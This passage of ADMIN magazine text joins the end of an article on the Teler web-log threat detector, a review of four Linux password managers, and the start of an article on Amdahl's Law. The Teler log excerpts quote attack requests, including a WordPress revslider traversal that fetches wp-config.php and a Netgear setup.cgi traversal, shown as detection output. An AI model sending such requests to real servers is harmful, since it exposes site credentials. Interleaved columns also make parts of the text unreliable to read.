Apache server), such as this entry: entries, the list of interesting issues is com/Archive/2015/25/Lean‑on‑Logwatch]
reduced to 1,705: [2] Teler: [https://github.com/kitabisa/teler]
[Directory Bruteforce] U [3] Teler release page: [https://github.com/
/s?p=8f0f9570a1e1fb28f829a361441abU $ cat threats.txt | grep ‑iv Crawler | wc kitabisa/teler/releases]
&t=bfd6c7c4&h=645cd72507b5af9d66d3425 [4] Docker Engine:
I would recommend boiling down the [https://docs.docker.com/engine/install]
I also found a number of WordPress results to a manageable level or, of [5] Teler config example:
attacks, most commonly this PHP course, running Teler over live logfiles [https://github.com/kitabisa/teler/blob/
test: for instant feedback and scripting master/teler.example.yaml]
alerts. [6] Common log format: [https://en.wikipedia.
[Directory Bruteforce] /wp‑login.php After filtering down the larger file, I org/wiki/Common_Log_Format]
discovered another interesting find- [7] Teler resource collections: [https://github.
Additionally, a high number of poten- ing: com/kitabisa/teler‑resources]
tially problematic crawler issues were [8] stdbuf:
logged: [Common Web Attack: Detects basic U [https://linux.die.net/man/1/stdbuf]
directory traversal] U

[Bad Crawler] python‑requests/2.22.0 /wp‑admin/admin‑ajax.phpU Author


[Bad Crawler] Java/1.8.0_131 ?action=revslider_show_imageU Chris Binnie’s latest book, Linux Server Security:
[Bad Crawler] curl/7.29.0 &img=../wp‑config.php Hack and Defend, shows how hackers launch sophis‑
ticated attacks to compromise servers, steal data,
From the Common Web Attack intel- Teler can also output results to a file and crack complex passwords, so you can learn
ligence feed, this example stood out in JSON format (Listing 4). how to defend against such attacks. In the book, he
immediately: also shows you how to make your servers invisible,
The End Is Nigh perform penetration testing, and mitigate unwel‑
[Common Web Attack: Detects specific U come attacks. You can find out more about DevOps,
directory and path traversal] U As you have seen, Teler is a highly DevSecOps, Containers, and Linux security on his
/setup.cgi?next_file=netgear.cfgU useful addition to any security tool- website: https://www.devsecops.cc.

Listing 4: JSON Output

$ teler ‑i apache.log ‑c teler.yml ‑‑json

/","status":"200","time_local":"07/Nov/2020:22:45:20 +0000"}
{"body_bytes_sent":"5695","category":"Bad Crawler","element":"http_user_agent","http_user_agent":"Mozilla/5.0 (compatible; BLEXBot/1.0;
+http://webmeup‑crawler.com/)","remote_addr":"XXX.XXX.XXX.XXX","request_method":"GET","request_protocol":"HTTP/1.1",
"request_uri":"/","status":"200","time_local":"07/Nov/2020:23:06:25 +0000"}

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 75
N U TS A N D B O LTS Password Managers

Managing access credentials

Key Moments
Most Internet services require password-protected individual accounts. A password
manager can help you keep track of all your access credentials. By Erik Bärwaldt

Whether you need to log into an password, leading to complex pass- Many of these services only work as
online store, read your email in the words. Last, but not least, users soon an extension of the web browser on
browser, check your account balance, forget their passwords for accounts that the client side. This makes them vul-
or upload photos to the cloud, most they rarely use, which makes access nerable to malware that compromises
services require an individual account even more difficult. the web browser as a platform. A
with authentication when accessing the To remedy this, a password manager local backup on a workstation com-
service. This raises various problems. can store essential information for the puter or an enterprise server without
Using the same passwords on multiple respective services along with your Internet-based access seems far more
accounts has long been considered a access credentials. You then typically elegant and secure than using an on-
bad idea. However, if you use a sepa- only need to remember the password line service.
rate password for each service, you can for the password manager. Of course, Password managers also often to
quickly lose track of which password developers need to effectively secure store more than just the plain vanilla
goes with which account. At the same the password manager itself. Oth- authentication data. Thanks to auto-
time, passwords need to meet certain erwise, unauthorized third parties type options, they also complete web
security requirements to resist brute will gain access to a large volume of pages with access data in a largely
force attacks. It is important to use up- individual access credentials in the automated way, saving users manual
percase and lowercase letters, numbers, event of theft. To see what current input. Different categories help keep
and special characters in a way that password managers have to offer, this track of the stored data.
prevents algorithms from cracking the article looks at four password manag-
ers: Buttercup, KeePassXC, Pasaffe, Buttercup
Not Considered and Password Safe (see also the “Not
Because there are so many password manag- Considered” box). Buttercup [5], a free, local, mul-
ers, we had to make a subjective selection tiplatform application, stores and
for this article. Many local password manag- Basic Functions retrieves access credentials both lo-
Lead Image © Marcel Goldbach, photocase.com

ers are no longer under development and cally and in the cloud. Several RPM
have therefore dropped out of the race. For A common practice among password and deb packages, as well as two
example, Gryptonite [1] (formerly GPass- managers is to offer online services AppImages, are available for instal-
word Manager) was last updated in 2015, and store credentials in the cloud, lation on Linux. The application
MyPasswords [2] in 2013, and the Python- creating potential vulnerabilities. Such supports both older 32-bit and cur-
based Loxodo [3] in 2018. Other text-based services are often commercial, and us- rent 64-bit operating systems [6].
password managers, like pass [4], are not ers do not know in detail where their Buttercup stores the user data in
covered here, because they do not provide a data ends up and what data security archives. After installation and first
graphical interface.
measures the provider takes. startup, Buttercup opens a window

76 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Password Managers N U TS A N D B O LTS

The new entry now ends up in the third


pane. If you want to edit an entry later
on, select the entry and press the Edit
button at the bottom of the far right
pane. Then save the entry again, so that
Buttercup will apply the changes.
If a group contains a particularly large
number of entries, you can sort them.
To do this, press the bar symbol top
right in the entry pane and select
the sort order in the pop-up context
menu. The software arranges entries
either alphabetically (Figure 2) or
chronologically, but you can reverse
the order for both options.

Browser Integration
Figure 1: After startup, Buttercup prompts you to create an archive in a modern interface.
If you use a browser extension, But-
prompting you to create an archive in the input field that appears. Press- tercup will also fill in the access cre-
(Figure 1). ing the Enter key transfers the group to dentials directly in the web browser.
Buttercup later saves the access data the group pane. Buttercup displays all For Chromium, Firefox, and their
in the archive; the data should ideally the groups in alphabetical order. derivatives, first install the respective
be categorized. Open a file manager Then select the group to which you browser extension. After that, an icon
to create the archive, and assign a want to add entries. The group name appears in the browser toolbar to the
name and storage path for the ar- is highlighted in green. After clicking right of the URL input box.
chive. Be sure to include the .bcup on Add Entry in the pane to the right Clicking on this icon lets you inte-
extension in each instance. If you of the group view, a dialog opens on grate an existing desktop archive into
forget it, Buttercup will not create the the far right. Now enter a name for the browser extension. To do this,
archive. the entry followed by the matching click on Add Vault in the add-on dia-
Once the archive is created, the soft- access credentials. If required, you log. The routine now opens a new
ware asks you to define a master can add more information to the page and asks for the source of the
password. Then the actual program current entry by clicking the Custom archive. You can choose between vari-
interface opens (Figure 2). The main Fields link. Finally, click on Save ous clouds, local WebDAV sources,
window is divided into four vertical bottom right. and the Local File option.
panes. In the narrow pane on the far
left, Buttercup arranges the existing
archives one below another. On first
launch, only the first archive is found
in this pane.
In the second pane, you will find the
group list where Buttercup sorts the
groups that belong to the selected
archive. In the third pane, Butter-
cup lists entries that belong to the
selected group. Finally, in the fourth
pane on the far right, Buttercup
shows the contents of the selected
entry. This is where you can create
usernames, passwords, and user-
defined fields.

Contents
To fill the databases, first press the
New Group button at the bottom of the
second pane and create a new group Figure 2: Buttercup sorts the entries for bank accounts alphabetically.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 77
N U TS A N D B O LTS Password Managers

If you choose an archive, the desk-


top application generates a six-digit
authentication code in a separate
window, which you enter in the
Authorization Code field in the
browser. Then click on Connect to
Desktop (Figure 3); the desktop
application must already be open.
Finally, transfer the desired archive
from a file manager displayed by the
desktop application. Browser inte-
gration is now ready for use. If you
want to link several archives with
one add-on in the browser, repeat
the procedure.
To access the credentials, the desk-
top application must be running at
initial setup and whenever the web
browser is opened for the first time. Figure 3: A local file acts as the data archive. If desired, you can also store your data safe
In addition, you need to re-enter in WebDAV or various online services.
the master password in the web
browser to open the desired archive. to save the access credentials. If you Information Exchange
A special window is displayed to press Save, the routine opens a new
help you do this. The data stored browser tab in which you can enter Buttercup imports datasets from
in the archive can only be accessed the access data (Figure 4). several other password managers if
after completing these steps. Under Archive and Group, use the required. For this purpose, it sup-
From now on, if you call up a web- drop-down menus to select the ar- ports CSV, XML, JSON, PIT (file
site that has access credentials stored chive and group where the new entry type 1), and BCUP; you can use
in the Buttercup archive, the soft- will be stored. After saving, the data various derivatives of the CSV for-
ware will automatically fill the fields is stored in the archive and available mat depending on the source appli-
with data. To allow this to happen, for future access to the website via cation. Buttercup also uses CSV to
click on the padlock icon next to the the add-on. You can also open the export the existing data. The respec-
input line for the username and en- new entry in the desktop application tive dialogs can be opened via the
ter the name of the archive entry in for editing, if necessary. File | Import or Export menus.
the Find Entries line. Assuming that
Buttercup then displays the name of
the archive entry below, click on the
entry, and the authentication data is
automatically transferred to the web
browser fields.
The browser extension is not a stand-
alone application. To open and use
the archives, you first need to start
the desktop application (i.e., unlock
the appropriate archives using the
master password). Without this step,
the web browser plugin will only dis-
play an error message when you try
to open an archive.
To add new entries to the open
archive, you do not have to take
a detour via the desktop applica-
tion. Simply enter your username
and password for the website. The
add-on will then display a message
in the upper right corner of the
browser window, asking if you want Figure 4: Enter additional access data in the browser for later backup to the archive.

78 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Password Managers N U TS A N D B O LTS

ChaCha20 algorithms, which also rely


on 256-bit keys. If you have powerful
hardware with multicore processors
and multithreading enabled, you can
also specify the number of threads to
be used in parallel in this dialog.
In the following dialog, you can
then set the master password for the
database.
Finally, you are taken to the main
KeePassXC window, which also ap-
pears if you are loading a previously
created database. At the top of the
main window, you will find the
menubar with a buttonbar below
for fast access to KeePassXC’s most
important functions.
Figure 5: KeePassXC impresses with an uncluttered interface when first launched. Below the menubar and buttonbar,
the main window is divided into
KeePassXC you can open an existing database or three panes (Figure 6). In the left
import data from third-party applica- pane, access credentials are grouped
KeePassXC [7], a community fork of tions in the welcome screen; there are by category in a tree structure. In the
the cross-platform KeePassX password separate dialogs with corresponding upper right pane, KeePassXC displays
manager, offers a graphical interface buttons for these actions. a corresponding list of the selected
and is installed locally. KeePassXC’s If you select Create new database, a group’s entries that have individual
range of functions goes far beyond that new window will open with a wizard authentication credentials. In the
of a conventional password manager. that mainly lets you to configure the lower-right pane, you will find the
The application includes a password encryption. To do so, tweak the vari- data for the selected entry. Even if
generator and an export and import ous basic settings in the Encryption you create a new database structure,
function that lets you use content in Settings dialog. this program window layout does not
other database formats across appli- To control the cryptographic configu- change.
cations. KeePassXC also has browser ration in detail, click on Advanced
integration for all common web brows- Settings in the bottom right corner. Getting Started
ers. An auto-type function ensures This opens a dialog where you can
automated entry of authentication data select an algorithm to encrypt your First, you must create at least one
from the KeePassXC database in vari- data. AES 256-bit is used by default, group. Otherwise, all the entries will
ous applications and services. but you can switch to the Twofish or end up in an unsorted mess in the tree
In addition, KeePassXC pays attention
to security. It stores all data with AES-
256 encryption, which makes it virtu-
ally impossible for unauthorized third
parties to read the secured access data.
The software is available from the re-
positories of the major Linux distribu-
tions and can easily be installed using
the corresponding graphical package
management routine. In addition, a
PPA archive is available for Ubuntu.
For the new package management
systems, Snap and AppImage, binary
archives are also available on the proj-
ect website [8], as well as a Flatpak
package on Flathub [9].
After opening KeePassXC for the first
time, you will see a clear-cut program
window (Figure 5), where you first
create a new database. Alternatively, Figure 6: KeePassXC secures access data in a clear cut way, offering instant retrieval.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 79
N U TS A N D B O LTS Password Managers

structure below the Root folder, which


quickly leads to confusion if there are
multiple entries. The Groups | New
Group menu item takes you to a dialog
that lets you create a group. Give the
group a meaningful name. The group
name then appears as a folder in the
tree structure in the left-hand pane
below the Root folder.
Next, you need to enter access creden-
tials for the individual accounts to the
newly created group. To do so, click
on the key with the down arrow (or
plus icon, depending on your version)
in the buttonbar. In the dialog that
opens, enter the account’s authentica-
tion data (Figure 7). Enter a title that
is as meaningful as possible as this
title will later appear in the upper-right
pane. Also enter a username and pass- Figure 7: The entry dialog also allows free text input and various options.
word, as well as the account’s URL. If
desired, you can specify whether the Semiautomatic that opens, check the Enable Auto-
access credentials have an expiration Type for this entry option. Then click
date. A free text field at the bottom lets In addition to the ability to save on the wrench (or gear) symbol top
you enter important notes. access credentials in the database right to switch to the application’s
Once the settings are complete, accept and query them when required, configuration menu. To link your web
the entry by pressing the OK button KeePassXC also automatically enters browser to KeePassXC, select Browser
at the bottom right. If you want to the data in the web browser on the Integration in the vertical toolbar. In
specify more advanced options for corresponding web page if desired. the dialog that opens, select the web
the selected account, clicking on Ad- This removes the need for tedious browsers available on the system in
vanced in the vertical toolbar on the typing, but it requires a few prepara- the box under the Enable integration
left opens a dialog where you can add tions beforehand. for these browsers label by checking
further information, including attach- First, you must enable the Auto-Type the boxes to the left of the browser
ments that you want KeePassXC to function for the selected entry. To names (Figure 8).
store in the database. do this, click on Auto-Type in the Note that KeePassXC only supports
Clicking Entry in the vertical toolbar vertical toolbar on the left when the the browsers listed in the selection
takes you back to the original dialog. entry is open. In the Settings dialog box. For Firefox, Chromium, and
After saving the entry, it now appears
in the upper right pane, which lists
all entries for the selected group.
If you define several groups, each of
them will be a subgroup of the last
group entered in the left pane. If you
want to move a group to a different
hierarchical level, click on it and drag
it to another position in the tree struc-
ture; if desired, you can drag an entry
one or more levels upwards.
Within the individual groups, you can
enter the corresponding entries in the
same dialog. For subsequent changes
to entries, first click on the entry to be
edited in the upper-right pane to select
it. The pencil Entry icon in the toolbar
then reopens the Edit entry dialog. You
can also remove the selected entry from
the list by pressing the delete icon. Figure 8: KeePassXC supports browser integration in a somewhat awkward way.

80 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Password Managers N U TS A N D B O LTS

some of their derivatives, you need In addition, KeePassXC must already Edit | Add Folder. The parent folder
to download add-ons in the next step be running to autofill access data. appears in a window and expects
and integrate them into the browser. You can do this in the automatic a name to be entered in the Folder
You can do this conveniently using the startup routine at system start time Name field.
links available in the configuration dia- by checking the Start only a single You can then create additional folders
log. Add-ons are used to connect web instance of KeePassXC option in the by right-clicking on the newly created
browsers and password management. General menu’s configuration dialog. folder and adding another folder to the
They must therefore be installed be- Also, if you check the box to the left database with Add Folder. Pasaffe al-
fore you can use the Auto-Type func- of Minimize window after unlocking ways creates the new folder below the
tion mentioned above. The respective the database window, KeePassXC will currently selected folder, creating a tree
add-ons appear in the browser toolbar be hidden away in the panel when hierarchy shown in the vertical pane on
as small status icons (Figure 9). minimized. the left. If you create additional folders
Then restart KeePassXC and go to one within an existing hierarchy, Pasaffe
of the addresses in your web browser Pasaffe will insert them in alphabetical order.
that you have set up for auto-type. You can also delete a folder using the
A small green key symbol will now Pasaffe [10] is a small password context menu, which you access by
appear on the chosen website in the manager published under GPLv3. right-clicking. However, this will re-
fields for entering the access data. Originally developed for Ubuntu, move all subfolders in this hierarchy
Simultaneously, another window will Pasaffe is now also included in vari- without prompting.
pop up and request the authentication ous derivatives such as Trisquel and If you want to create a new folder
data from KeePassXC for access (Fig- Linux Mint, as well as in Arch-based and place it in a different hierarchical
ure 10). Click on Allow Selection; this distributions such as Manjaro. Be- level, you do not have to switch to
will autofill the credentials from the sides a PPA for Ubuntu, the source the desired level first. Instead, enter
KeePassXC database into the fields code is also available. the correct path for the new directory
without requiring any further input Developed for the Gnome desktop, in the Parent Folder field. Note that in
from you. Pasaffe can also be used with other such cases the hierarchy always starts
To use auto-type, the chosen website desktop environments without any with the root folder /; you therefore
must request the username and pass- problems. The straightforward program need to enter the full path.
word together. If a website opens a opens a small window after installa- Once the folder structure exists, you
new page or a window to prompt you tion, where you can enter a master can add the corresponding database
for a password after the username password for the new database. Then it entries. To do this, use the Add Entry
has been entered, KeePassXC does au- creates the database and opens the very option in a folder’s context menu
tofill the authentication data. simple main window (Figure 11). (you can also access this via the Edit
menu if necessary). Alternatively, you
Nomenclature can open the dialog using the second
button from the left in the buttonbar
Pasaffe divides of the main window.
datasets to be In the input window, you enter a
entered into fold- name for the entry, the URL, and the
ers and entries. authentication data. A note field also
Folders function as allows free text input of important
groups in which data for this entry. After a final click
Figure 9: The add-on reports its operational readiness with a you store similar on OK, the entry appears on the left
status icon. authentication below the active folder. In the right-
data. To create the hand pane, you will find the details of
first folder, go to the current entry (Figure 12).

Figure 10: A single mouse click lets you allow autofill for access Figure 11: Pasaffe greets users after launching with a mostly empty
credentials. main window.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 81
N U TS A N D B O LTS Password Managers

Inserted notes also appear on the right, New button top


but the password for the respective left in the titlebar
entry is only shown as asterisks. If nec- (Figure 13) and
essary, you can make the password vis- assign a name in
ible by clicking on the last icon, Show the now opened
Confidential, top right in the toolbar file manager.
(click on the ellipses if you do not see In the next
the option). The password now appears dialog, you can
in plain text and can be made anony- define the access
mous by clicking the button again. procedure for the
database. You
Seek and Ye Shall Find can choose from
three options: a
With extensive datasets, you can very password, a key Figure 12: Pasaffe arranges groups and entries in a tree structure.
quickly get lost in Pasaffe’s main win- file, or both.
dow. In this case, click on the magni- After opening the new safe, you are that might be useful as attachments.
fying glass icon in the toolbar. In the taken to an empty window. Here you Password Safe automatically saves
search field located top right, you can can create groups to which you assign the changes to the entry data again.
now enter the entry name for which individual websites’ access creden- When the respective group is called
you are searching. The application tials by category. To do this, click on up again, the changes appear in tabu-
jumps to this entry in the left window the hamburger menu in the top right- lar form in the program window.
pane and displays the required data hand corner and select the New Group To switch to another group, first
on the right below the search field. option. In an input dialog, type in the click on the home icon located top
group name and optionally add a note left in the titlebar and then select the
In the Browser in a free text field. You do not have desired group from the table of dis-
to save the entered data; the software played groups. The program window
Pasaffe does not offer a browser add-on does this automatically. lists the entries for the group, while
for automatic entry of access creden- To add entries to the individual groups the active group appears in the top
tials. Instead, you need to select a data- (which are tagged with a folder icon), right corner next to the home icon.
base entry and open the corresponding click on the home icon on the left and
URL by clicking on the home icon in then select the desired group. The se- Settings
the toolbar. This will launch the web lected group then appears to the right
browser, which then calls up the page of the home icon in the titlebar. Now The Settings dialog (Figure 14),
for entering the access data. Unlike a click on the hamburger icon in the which you open via the hamburger
browser add-on, username and pass- right-hand corner of the titlebar and menu, offers a few options for cus-
word input is only partly automated. select the New Entry option. tomizing the software.
You need to copy the access credentials This step opens a dialog for the au- Under Safe, use a slider to activate
to the clipboard by selecting Copy User thentication data. For each entry, the option Save Automatically. In the
Name and Copy Password and then you can also store important notes Security tab, you will also want to set
paste these into the appropriate fields in a free text field. Additionally, the a different interval for Time threshold
in the web browser. Attachments field lets you store files for locking the safe if your computer

Password Safe
Password Safe [11] is based on the
Gnome desktop in terms of appear-
ance and ergonomics, but it can also
be used with other desktops. Pass-
word Safe is available as a Flatpak
and can therefore be installed across
different distributions.
The installation routine creates a
starter in the desktop menu tree. After
the first launch, a visually appealing
program window appears in which
you first need to create a KeePass-com-
patible database. To do so, press the Figure 13: Password Safe lacks just about all conventional control elements.

82 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Password Managers N U TS A N D B O LTS

frequently runs in unattended mode. Table 1: Graphical Password Managers


This function locks the password safe
Buttercup KeePassXC Pasaffe Password Safe
if you do not perform any actions in
the software for a longer period of License GPLv3 GPLv2 GPLv3 GPLv3
time. You then have to enter the mas- Functions
ter password again for further access. Available across platforms Yes Yes No No
Desktop application Yes Yes Yes Yes
Multiple Safes Browser extension Yes Yes No No
User guidance
In Password Safe, you can use several
Multiple archives Yes Yes No No
data safes in parallel. To create a new
one, click on the New Safe option in Multiple groups Yes Yes Yes Yes
the hamburger menu and configure Free text input Yes Yes Yes Yes
it. The new safe then appears as a Data import Yes Yes Restricted Restricted
new horizontal tab in the applica- Data export Yes Yes Restricted Restricted
tion’s main window, which allows a Password generator Yes Yes Yes Yes
quick change between the individual Auto-Type Yes Yes Restricted Restricted
safes. You can also block these safes
Security
by clicking on the padlock symbol
at the top of the hamburger menu’s Cloud backup Configurable Yes No No
Options dialog, thereby blocking the Encryption Yes Yes Yes Yes
active safe. If you call up the active Adjustable encryption No Yes No No
safe again, the dialog for entering the algorithm
master password appears.
button. The access data can then be in their web browsers. Buttercup addi-
Password Safe in the Browser called up from the clipboard in the tionally impresses with a modern, vi-
browser whenever you need to fill out sually appealing interface. KeePassXC
Password Safe does not have add- the fields on the website. converts data to and from other for-
ons a for the popular web browsers. mats thanks to numerous filters.
Nevertheless, you do not have to Conclusions Despite all the simplifications made
laboriously query the data in the ap- by these password managers, cau-
plication and then transfer it to the Local password managers make work- tious users are still advised to keep
web browser. Instead, you can save ing with large volumes of access records and backups of their access
the usernames and passwords for the credentials far easier. The four test credentials to ensure continued ac-
individual entries in Password Safe candidates all cover the basic range of cess to protected data in the event of
by clicking on the Copy to Clipboard functions for password management, an accident. n
but they focus on
different target Info
groups in terms of [1] Gryptonite: [https://sourceforge.net/
features (Table 1). projects/gryptonite/]
Password Safe [2] MyPasswords: [https://sourceforge.net/
and Pasaffe are projects/mypasswords7/]
more suitable for [3] Loxodo:
home use, as they [https://github.com/sommer/loxodo]
do not offer add- [4] pass: [https://www.passwordstore.org]
ons for common [5] Buttercup: [https://buttercup.pw]
web browsers. Ac- [6] Download Buttercup: [https://github.com/
cess data must be buttercup/buttercup-desktop/releases]
entered here spe- [7] KeePassXC: [https://keepassxc.org]
cifically via the [8] Download KeePassXC:
clipboard on web- [https://keepassxc.org/download/#linux]
sites. Buttercup [9] KeePassXC Flatpak package :
and KeePassXC [https://flathub.org/apps/details/org.
are aimed at pro- keepassxc.KeePassXC]
fessional users [10] Pasaffe: [https://launchpad.net/pasaffe]
who want to save [11] Password Safe: [https://gitlab.gnome.org/
Figure 14: Password Safe has a very simple configuration dialog. themselves typing World/PasswordSafe]

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 83
N U TS A N D B O LTS Parallel Performance

Why Good Applications Don’t Scale

Speed Limits

You have parallelized your serial application, but as you use more cores you are not seeing any improvement in
performance. What gives? By Jeff Layton
You just bought a new system with dance,” you go for it and run it on time. In fact, the wall clock time can
lots and lots of cores (e.g., a desk- four cores. The code runs in just over increase as you add processors, as
top with 64 cores or a server with two minutes (126 seconds). This is it did in the example here. The scal-
128 cores). Now that you have all of 70 percent of the time on a single ability of the application is limited for
these cores, why not take advantage core. Maybe not as great as the jump some reason: Amdahl’s Law. In 1967
of them by parallelizing your code? from one to two cores, but it is run- Gene Amdahl proposed the formula
Depending on your code and your ning faster than a single core. Now underlying these observed limits of
skills, you have a number of paths to try eight cores (more is better, right?). scalability:
parallelization, but after some hard This runs in just under two minutes
work profiling and lots of testing, (117 seconds) or about 65 percent of
your application is successfully paral- the single core time. What?
lelized – and it gives you the correct Now it’s time to go for broke and use In Equation 1, a is the application
answers! Now comes the real proof: 32 cores. This test takes about 110 speedup, n is the number of proces-
You start checking your application’s seconds or about 61 percent of the sors, and p is the “parallel fraction”
performance as you add processors. single core time. Argh! You feel like of the application (i.e., the fraction
Suppose that running on a single core Charlie Brown trying to kick the foot- of the application that is paralleliz-
takes about three minutes (180 sec- ball when Lucy is holding it. Enough able), ranging from 0 to 1. Equations
onds) of wall clock time. Cautiously, is enough: Try all 64 cores. The ap- are nice, but understanding how they
but with lots of optimism, you run plication takes 205 seconds. This is work and what they tell us is even
it on two cores. The wall clock time maddening! Why did the wall clock more important. To do this, examine
is just about two and a half minutes time go up? What’s going on? the extremes in the equation and see
(144 seconds), which is 80 percent what speedup a can be achieved.
Lead Image © man64, 123RF.com

of the time on a single processor. Gene Amdahl In an absolutely perfect world, the
Success! parallelizable fraction of the applica-
You are seeing parallel processing in In essence, the wall clock time of an tion is p = 1, or perfectly paralleliz-
action, and for some HPC enthusiasts, application does not scale with the able. In this case, Amdahl’s Law re-
this is truly thrilling. After doing your number of cores (processors). Adding duces to a = n. That is, the speedup
“parallelization success celebration processors does not linearly decrease is linear with the number of cores

84 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Parallel Performance N U TS A N D B O LTS

and is also infinitely scalable. You can the minimum wall clock time the As the number of processors in-
keep adding processors and the ap- application can ever achieve is 200 creases to infinity, you reach a
plication will get faster. If you use 16 seconds. Figure 1 shows a plot of the speedup limit. The asymptotic value
processors, the application runs 16 resulting wall clock time on the y- of a = 5 is described by Equation 2:
times faster. It also means that with axis versus the number of processes
one processor, a = 1. from 1 to 64.
At the opposite end, if the code has a The blue portion of each bar is the
zero parallelizable fraction (p = 0), application serial wall clock time and
then Amdahl’s Law reduces to a = 1, the red portion is the application par- Recall the parallelizable portion of
which means that no matter how allel wall clock time. Above each bar the code is p. That means the serial
many cores or processes are used, the is the speedup a by number of pro- portion is 1 - p, so the asymptote is
performance does not improve (the cesses. Notice that with one process, the inverse of the serial portion of the
wall clock time does not change). the total wall clock time – the sum code, which controls the scalability
Performance stays the same from one of the serial portion and the parallel of the application. In this example,
processor to as many processors as portion – is 1,000 seconds. Amdahl’s p = 0.8 and (1 - p) = 0.2, so the
you care to use. Law says the speedup is 1.00 (i.e., the asymptotic value is a = 5.
In summary, if the application can- starting point). Further examination of Figure 1 il-
not be parallelized, the parallelizable Notice that as the number of proces- lustrates that the application will
fraction is p = 0, the speedup is sors increases, the wall clock time continue to scale if p > 0. The wall
a = 1, and application performance of the parallel portion decreases. clock time continues to shrink as the
does not change. If your application The speedup a increases from 1.00 number of processes increases. As
is perfectly parallelizable, p = 1, the with one processor to 1.67 with two the number of processes becomes
speedup is a = n, and the perfor- processors. Although not quite a dou- large, the amount of wall clock time
mance of the application scales lin- bling in performance (a would have reduced is extremely small, but it
early with the number of processors. to be 2), about one-third of the pos- is non-zero. Recall, however, that
sible performance was lost because of applications have been observed to
Further Exploration the serial portion of the application. have a scaling limit, after which the
Four processors only gets a speedup wall clock time increases. Why does
To further understand how Amdahl’s of 2.5 – the speedup is losing ground. Amdahl’s Law say that the applica-
Law works, take a theoretical applica- This “decay” in speedup continues as tions can continue to reduce wall
tion that is 80 percent parallelizable processors are added. With 64 proces- clock time?
(i.e., 20 percent cannot be parallel- sors, the speedup is only 4.71. The
ized). For one process, the wall clock code in this example is 80 percent Limitations of Amdahl’s Law
time is assumed to be 1,000 seconds, parallelizable, which sounds really
which means that 200 seconds of the good, but 64 processors only use The disparity between what Am-
wall clock time is the serial portion of about 7.36 percent of the capability dahl’s Law predicts and the time
the application. From Amdahl’s Law, (4.71/64). in which applications can actually
run as processors are added lies in
the differences between theory and
the limitations of hardware. One
such source of the difference is that
real parallel applications exchange
data as part of the overall computa-
tions: It takes time to send data to
a processor and for a processor to
receive data from other processors.
Moreover, this time depends on the
number of processors. Adding pro-
cessors increases the overall com-
munication time.
Amdahl’s Law does not account for
this communication time. Instead, it
assumes an infinitely fast network;
that is, data can be transferred in-
finitely fast from one process to
another (zero latency and infinite
Figure 1: The influence of Amdahl’s Law on an 80 percent parallelizable application. bandwidth).

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 85
N U TS A N D B O LTS Parallel Performance

Non-zero Communication portion sB = 0.195, independent of Amdahl’s Law that includes com-
of n, leaves the communication por- munication time in some fashion.
Time
tion sC = 0.005. Figure 2 shows the Another assumption in Amdahl’s
A somewhat contrived model can il- plot of speedup a as a function of the law drove the creation of Gustafson’s
lustrate what happens when commu- number of processors. Law. Whereas Amdahl’s Law assumes
nication time is non-zero. This model Notice that the speedup increases for the problem size is fixed relative to
assumes that serial time is not a func- a bit but then decreases as the num- the number of processors, Gustafson
tion of the number of processes, just ber of processes increases, which is argues that parallel code is run by
as does Amdahl’s Law. Additionally, the same thing as increasing the num- maximizing the amount of computa-
a portion of time is not parallelizable ber of processors and increasing the tion on each processor, so Gustafson’s
but is also a function of the number wall clock time. Law assumes that the problem size
of processors, representing the time Notice that the peak speedup is only increases as the number of processors
for communication between proces- about a = 3.0 and happens at around increases. Thus, solving a larger prob-
sors that increases as the number of 16 processors. This speedup is less lem in the same amount of time is
processes increases. than that predicted by Amdahl’s Law possible. In essence, the law redefines
To create a model, start with a con- (a = 5). Note that you can analyti- efficiency.
straint from Amdahl’s Law that says cally find the number of processors You can use Amdahl’s Law, Gus-
the sum of the parallelizable fraction for the peak speedup by taking the tafson’s Law, and derivatives that
p and the non-parallelizable fraction derivative of the equation plotted in account for communication time as
(1 - p) has to be 1: Figure 2 with respect to n and setting a guide to where you should con-
it to 0. You can then find the speedup centrate your resources to improve
from the peak value of n. I leave this performance. From the discussion
Remember that in Amdahl’s Law the exercise to the reader. about these equations, you can see
serial or non-parallelizable fraction is Although the model is not perfect, it that focusing on the serial portion of
not a function of the number of pro- does illustrate how the application an application is an important way to
cessors. Assume the serial fraction is: speedup can decrease as the number improve scalability.
of processes increase. On the basis
of this model, you can say, from a Origin of Serial Compute
The constraint can then be rewritten as: higher perspective, that the equation
for a must have a term missing that
Time
perhaps Amdahl’s Law doesn’t show Recall that the serial portion of an
The serial fraction can be broken into that is a function of the number of application is the compute time that
two parts (Equation 6), where sB is processes causing the speedup to de- doesn’t change with the number of
the base serial fraction that is not a crease with n. processors. The parts of an application
function of the number of processors, Some other attempts have been that contribute to the serial portion of
and sC is the communication time be- made to account for non-zero com- the overall application really depend
